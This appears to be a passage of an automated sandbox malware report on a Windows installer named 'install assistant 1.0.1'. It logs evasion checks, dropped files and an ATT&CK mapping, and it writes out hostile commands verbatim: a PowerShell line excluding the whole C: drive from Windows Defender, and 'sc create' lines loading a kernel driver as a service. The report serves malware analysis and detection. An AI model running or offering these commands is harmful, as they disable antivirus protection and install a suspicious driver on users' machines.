Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5693Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3929Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpWindow / User API: threadDelayed 648Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpWindow / User API: threadDelayed 717Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpWindow / User API: threadDelayed 621Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P2CCP.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5OPPK.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-5OPPK.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-P2CCP.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6648Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9BAEC0 FindFirstFileA,FindClose,FindClose,6_2_6C9BAEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00716868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00716868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00717496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00717496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00719C60 GetSystemInfo,10_2_00719C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000002.00000002.2073106693.000000000098E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C843886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6C843886
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9D0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C9D0181
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007957D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_007957D0
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9D9D35 mov eax, dword ptr fs:[00000030h]6_2_6C9D9D35
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9D9D66 mov eax, dword ptr fs:[00000030h]6_2_6C9D9D66
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9CF17D mov eax, dword ptr fs:[00000030h]6_2_6C9CF17D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9C8CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C9C8CBD
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6C9D0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C9D0181

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-LDPLH.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.1.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-PB21B.tmp\#U5b89#U88c5#U52a9#U624b1.0.1.tmpCode function: 6_2_6CA97720 cpuid 6_2_6CA97720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0071AB2A GetSystemTimeAsFileTime,10_2_0071AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007B0090 GetVersion,10_2_007B0090
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Service Execution
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory321
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem25
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580229 Sample: #U5b89#U88c5#U52a9#U624b1.0.1.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 84 90 Multi AV Scanner detection for submitted file 2->90 92 Found driver which could be used to inject code into processes 2->92 94 AI detected suspicious sample 2->94 96 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->96 10 #U5b89#U88c5#U52a9#U624b1.0.1.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 31 other processes 2->17 process3 file4 86 C:\...\#U5b89#U88c5#U52a9#U624b1.0.1.tmp, PE32 10->86 dropped 19 #U5b89#U88c5#U52a9#U624b1.0.1.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 27 other processes 17->33 process5 file6 72 C:\Users\user\AppData\Local\...\update.vac, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->74 dropped 98 Adds a directory exclusion to Windows Defender 19->98 35 #U5b89#U88c5#U52a9#U624b1.0.1.exe 2 19->35         started        38 powershell.exe 23 19->38         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 26 other processes 33->53 signatures7 process8 file9 76 C:\...\#U5b89#U88c5#U52a9#U624b1.0.1.tmp, PE32 35->76 dropped 55 #U5b89#U88c5#U52a9#U624b1.0.1.tmp 4 16 35->55         started        100 Loading BitLocker PowerShell Module 38->100 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 78 C:\Users\user\AppData\Local\...\update.vac, PE32 55->78 dropped 80 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 55->80 dropped 82 C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32 55->82 dropped 84 C:\Program Files (x86)\Windows NT\7zr.exe, PE32 55->84 dropped 102 Query firmware table information (likely to detect VMs) 55->102 104 Protects its processes via BreakOnTermination flag 55->104 106 Hides threads from debuggers 55->106 108 Contains functionality to hide a thread from the debugger 55->108 63 7zr.exe 2 55->63         started        66 7zr.exe 7 55->66         started        signatures13 process14 file15 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b1.0.1.exe7%VirustotalBrowse
#U5b89#U88c5#U52a9#U624b1.0.1.exe0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-5OPPK.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-P2CCP.tmp\_isetup\_setup64.tmp0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b1.0.1.exefalse
    high
    https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2043797965.00000000027A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2044209367.000000007F5CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000002.00000000.2046102925.0000000000CE1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000000.2069014707.0000000000CCD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.dr, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.drfalse
      high
      https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2043797965.00000000027A0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.exe, 00000000.00000003.2044209367.000000007F5CB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000002.00000000.2046102925.0000000000CE1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp, 00000006.00000000.2069014707.0000000000CCD000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.5.dr, #U5b89#U88c5#U52a9#U624b1.0.1.tmp.0.drfalse
        high
        No contacted IP infos
